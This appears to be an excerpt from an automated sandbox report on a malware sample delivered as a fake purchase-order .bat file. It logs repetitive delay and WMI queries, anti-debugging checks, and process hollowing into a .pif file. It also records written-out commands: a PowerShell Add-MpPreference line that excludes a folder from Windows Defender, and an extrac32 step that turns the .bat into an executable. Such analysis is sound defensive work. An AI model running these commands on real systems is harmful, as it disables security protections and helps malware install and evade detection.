Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_02E45908

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99792	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99227	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99027	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98915	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98788	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98667	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98560	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98454	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98310	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98167	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97929	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97796	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97680	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97466	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97349	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97213	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97089	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96966	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96808	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96390	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96268	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96144	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96020	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95893	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95765	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95653	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95542	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95430	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95320	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95200	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95087	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94853	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94743	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94634	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94495	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94377	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94244	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94113	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93977	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93660	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93392	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93166	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99853	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99688	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99825
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99378
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98963
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98847
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98718
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98603
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98484
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98353
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98220
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98089
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97956
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97754
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97499
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97358
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97238
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97100
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96991
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96789
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96199
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95844
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95705
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95481
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95325
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95156
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94986
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94810
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94636
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94311
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94191
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94042
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93915
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99852
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99690
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99555
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99394
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99226
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99059
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98628
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98223
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98056
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97817
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97245
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97005
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96861
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96702
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96591
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96480
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96368
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96263
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96151
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96032
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95904
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95794
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95685
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95576
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95467
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95357
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95248
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95139
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95019
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94899
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94639
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94495
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94283
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94154
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94044
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93931
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93825
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93717
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93607
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199859
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199750
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199640
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199531
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199422
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199312
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 1199202
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99873
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99757
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99528
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99420
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99310
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99201
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99091
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98983
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98873
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98764
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98654
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98545
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98436
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98327
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98210
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97967
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97824
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97611
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97483
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97372
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97260
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97153
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97045
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96936
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96826
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96716
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96608
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96498
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96389
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96280
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96170
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96061
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95951
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95842
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95733
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95620
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95514
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95405
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95295
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95165
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95027
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94906
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94635
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94527
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94420
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94311
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94202
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94092
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93983
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93872
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Wisrysxl.PIF, 0000001A.00000002.1591107014.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy90
Source: neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node			graph_4-38355
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E5F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

4_2_02E5F744

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02E5894C

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 12_1_004BF794 mov eax, dword ptr fs:[00000030h]		12_1_004BF794
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 28_1_004BF794 mov eax, dword ptr fs:[00000030h]		28_1_004BF794

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 12_1_004015D7 SetUnhandledExceptionFilter,	12_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 12_1_004015D7 SetUnhandledExceptionFilter,	12_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 28_1_004015D7 SetUnhandledExceptionFilter,	28_1_004015D7
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Code function: 28_1_004015D7 SetUnhandledExceptionFilter,	28_1_004015D7

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Section unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2E1008	Jump to behavior
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 352008
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Memory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 290008

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
